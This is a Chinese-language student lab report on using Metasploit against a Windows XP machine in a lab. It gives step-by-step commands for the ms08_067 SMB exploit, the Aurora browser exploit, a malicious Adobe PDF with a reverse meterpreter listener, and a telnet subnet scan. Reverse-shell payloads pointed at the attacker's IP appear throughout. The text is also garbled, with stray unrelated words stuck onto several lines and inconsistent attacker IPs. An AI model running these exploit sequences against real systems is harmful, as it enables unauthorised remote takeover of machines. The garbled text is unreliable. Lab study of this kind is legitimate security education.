1、實踐內容shell
本實踐目標是掌握metasploit的基本應用方式,重點經常使用的三種攻擊方式的思路。具體須要完成:windows
1.一個主動攻擊實踐,如ms08_067; (成功)api
2.一個針對瀏覽器的攻擊,如ms11_050;(成功)瀏覽器
3. 一個針對客戶端的攻擊,如Adobe;(成功)服務器
4.成功應用任何一個輔助模塊。(成功且惟一)tcp
2、實踐過程編碼
準備工做:首先先肯定Linux和XP的IPspa
Linux:222.28.133.163d
XP:222.28.133.242code
(1)首先進入msf平臺,查找這個漏洞,能夠看到他的具體目錄來進行使用
(2)輸入指令 use exploit/windows/smb/ms08_067_netapi,而後使用 show payloads 查看可使用的payload,選擇一個use後,能夠經過 show options 查看須要設置的具體參數
(3)配置參數
輸入指令 set payload generic/shell_reverse_tcp
設置攻擊機ip set LHOST 222.28.133.16
設置攻擊端口 set LPORT 4314
設置靶機ip set RHOST 222.28.133.242
設置自動選擇目標系統類型 set target 0
(4)設置完成後就能夠執行了,能夠看到,已經得到了xp的權限
(1)查找這個漏洞,查看他的具體目錄,使用後查看可使用的payload
(2)使用指令 use exploit/windows/browser/ms10_002_aurora
選擇一個payload set payloads windows/meterpreter/reverse_http
設置相關參數,
set lhost 222.28.133.16攻擊方IP;
set lport 4314 攻擊方端口;
set target 0
set uripath gly 資源標識符路徑設置;
(3) exploit 後,能夠看到生成了一個URL,可是這裏顯示的 0.0.0.0 實際是本機ip,因此應該使用的是 Local IP 做爲攻擊的連接
(4)在xp系統裏訪問連接 http://222.28.133.16:8080/gly ,能夠看到,kali獲取了xp的權限
(1)輸入指令 use windows/fileformat/adobe_cooltype_sing
(2)配置滲透攻擊所需的配置項:
設置載荷: set payload windows/meterpreter/reverse_tcp
設置攻擊機IP: set LHOST 222.28.133.16
設置端口: set LPORT 4314
設置產生的文件: set FILENAME 4314.pdf
設置完成後鍵入 exploit
(3)根據路徑找到該pdf文件放到靶機裏。
根據路徑發現找不到對應的文件,由於目錄是 .的,是一個隱藏目錄,因此咱們要設置查看隱藏文件後,找到具體文件
(4)使用命令 back 退出當前模塊,啓動一個對應於載荷的監聽端,等待靶機回連
輸入:
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 222.28.133.16 set lport 4314
(5)在靶機中打開該pdf,回連成功
(1)先 search scanner 查看可使用的具體模塊
(2)選擇一個 telnet_version模塊使用
(telnet_version輔助模塊將掃描子網和指紋識別正在運行的任何遠程登陸服務器)
輸入指令 use auxiliary/scanner/telnet/telnet_version
輸入指令 show options ,查看須要設置的具體參數;
(3)參數配置
輸入如下指令,
set RHOSTS 222.28.133.0/24
set RPORT 4314
set THREADS 254
(4)運行之後,獲得如下結果,
用本身的話解釋什麼是exploit,payload,encode.
我認爲exploit就是執行、開採,利用漏洞對靶機進行相應的攻擊;payload就是漏洞攻擊的有效載荷,是漏洞攻擊的手段,是漏洞攻擊成功必要的載體;encode就是編碼器,就是對攻擊進行假裝。
經過此次實驗,咱們見識到了msf平臺的厲害,不只能夠利用多種輔助模塊獲取靶機信息,還可以查看大部分存在的漏洞並利用這些漏洞實現不一樣攻擊,這裏面,直接實現主動攻擊是最恐怖的,只要系統存在這個漏洞,就會被直接攻破,看來,實時更新系統是頗有必要的。